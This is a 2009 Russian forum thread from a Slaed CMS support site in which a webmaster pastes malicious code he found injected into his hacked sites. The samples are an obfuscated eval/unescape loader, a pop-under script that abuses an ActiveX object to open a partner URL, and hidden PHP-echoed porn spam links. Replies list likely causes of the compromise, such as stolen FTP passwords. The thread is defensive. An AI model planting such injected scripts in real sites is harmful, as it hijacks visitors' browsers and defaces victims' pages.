Понедельников НЕТ!
Регистрация или вход Регистрация или вход Избранное на этом сайте | Главная | Анкета | Рекомендовать | Обратная связь | В избранное | Сделать домашней
Скачать SSDForums
Скачать SSDForums 1.0.1 Скачать SSDForums 1.0.1
Скачать SSDForums 1.0.1 SP1 Скачать SSDForums 1.0.1 SP1
Скачать SSDForums 1.0.1 SP2 Скачать SSDForums 1.0.1 SP2
SSD Forums 1.0.1 SP3 only Slaed 3.5 Pro SSD Forums 1.0.1 SP3 only Slaed 3.5 Pro
SSD Forums 1.0.1 SP4-beta only Slaed 4.1 Pro SSD Forums 1.0.1 SP4-beta only Slaed 4.1 Pro
Jewelry Сase Team
Скачать Ruby Chat 0.1.1 Скачать Ruby Chat 0.1.1
Меню
Главная
Форум
Магазин цифровых товаров

Новости
Подписка на новости
Темы новостей
Добавить новость

Каталог файлов
Карта файлового архива
Публикации

Опросы
Анкета пользователя
Чат

BestMaker
Викторина
Архив новостей
Карманный оракул
Поиск по сайту с помощью Яндекс
Поиск по сайту с помощью Google
Фото дня
Для души
Погода на 3 дня
IndexCat
IndexTop
Map_Pages
Поиск по сайту









Подписка на новости
Ваше имя:
Ваш E-Mail:*
Секретный код:
Секретный код
Повторить:*
Интересное в сети

Sape — это система купли-продажи ссылок
с главных и внутренних страниц сайтов
Форум -> Безопасность сайта -> Вредоносный код
Вредоносный код
LepRiKonS Дата: 04.05.2009, в 01:55 | Сообщение №1
LepRiKonS
Пользователь
Пользователь №: 215
Сообщений: 39

Уже не первый раз мои сайты на слаеде подвергаются атакам, с установкой вредоносного кода.

Сейчас чищу каждый файл, вот часть некоторых "левых" кодов:

Код
1
<script> eval(unescape("document.write%28String.fromCharCode%2860 //удалено, поскольку не несет смысловой нагрузки  %3B")); </script>


Код
1
<!-- ad --><script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"><!--
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:800px; dialogHeight:600px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0;help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = "scrollbars=1,menubar=1,toolbar=1,location=1,person albar=1,status=1,resizable=1";
var exit = true;
var usePopDialog = true;
var isUsingSpecial = false;
function normal_exit(){
if(exit && !isUsingSpecial) {
exit = false;
window.open(popURL,"",popWindowOptions);}}
--></script>

<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
if(exit)
{
exit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}

//--------------------------------------------------------------------------------

function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}

//--------------------------------------------------------------------------------

function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------
</script>
<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()"><!-- /ad --><?php echo '<br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<div align="center">
  <center>
  <table border="0" width="100%">
    <tr>
      <td width="50%"><font face=Arial size=3 color=#F0EEEC><a href="http://www.eroticweb.ru"><b>порно</b></a></font></td>
    </center>
    <td width="50%">
      <p align="right"><b><a href="http://www.eroticweb.ru"><font color="#808000">скачать
      порно</font></a></b></td>
  </tr>
  </table>
</div>'; ?><?php echo '<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<p align=right><a href=http://eroticweb.ru><font face=Arial size=3 color=#F0EEEC>скачать порно</font></a></p>
<p align=right><font face=Arial size=3 color=#F0EEEC><a href=http://eroticweb.ru>порно</a></font></p>'; ?>


А также непонятные файлы (прикрепил к посту) и папки.

Может кто знает, как можно обезопасить себя от подобного?

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Отредактированно Serg_pnz 04.05.2009 г. в 08:15:37
LepRiKonS Дата: 04.05.2009, в 02:09 | Сообщение №2
LepRiKonS
Пользователь
Пользователь №: 215
Сообщений: 39

Второй файл
Serg_pnz Дата: 04.05.2009, в 09:54 | Сообщение №3
Serg_pnz
Администратор
Пользователь №: 1
Сообщений: 2242

Как правило причины кроются:
1. Неправильные (избыточные) права на файлы
2. Взлом хостера
3. Взлом (кража) паролей фтп (ищи троянов у тебя на компе)

Не все кальсоны с оторванными пуговицами - брюки. © Serg_pnz
"...даме водки? Это чистый спирт!" © кот Бегемот
LepRiKonS Дата: 04.05.2009, в 10:01 | Сообщение №4
LepRiKonS
Пользователь
Пользователь №: 215
Сообщений: 39

Эх, я думал что-либо сверхъестественное :) такая проблема только со слаед (еще использую WordPress, но с ним все нормально).

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Отредактированно LepRiKonS 04.05.2009 г. в 10:05:42
moskmii Дата: 06.07.2009, в 23:30 | Сообщение №5
moskmii
Активный участник
Пользователь №: 96
Сообщений: 184

Воспользуйся этим скриптом и поменяй пароли фтп, проверь ком антивирусом...

http://www.ponedelnikov.net/index.php?name=Forums&op=showtopic&id=1236&pagenum=1#7

Вы не можете ответить в тему анонимно, пожалуйста, войдите или зарегистрируйтесь!


Реклама
Главная | Форум | Новости | Подписка на новости | Темы новостей | Добавить новость | Каталог файлов | Карта файлового архива | Публикации | Опросы | Анкета пользователя | Чат | BestMaker | Викторина | Архив новостей | Карманный оракул | Поиск по сайту с помощью Яндекс | Поиск по сайту с помощью Google | Фото дня | Для души | Погода на 3 дня | IndexCat | IndexTop | Map_Pages | Весь Оракул

Rambler's Top100

Генерация страницы: 0.259 сек. и 17 запросов к базе данных за 0.022 сек.
Web site engine code is Copyright © 2006 by SLAED CMS. All rights reserved.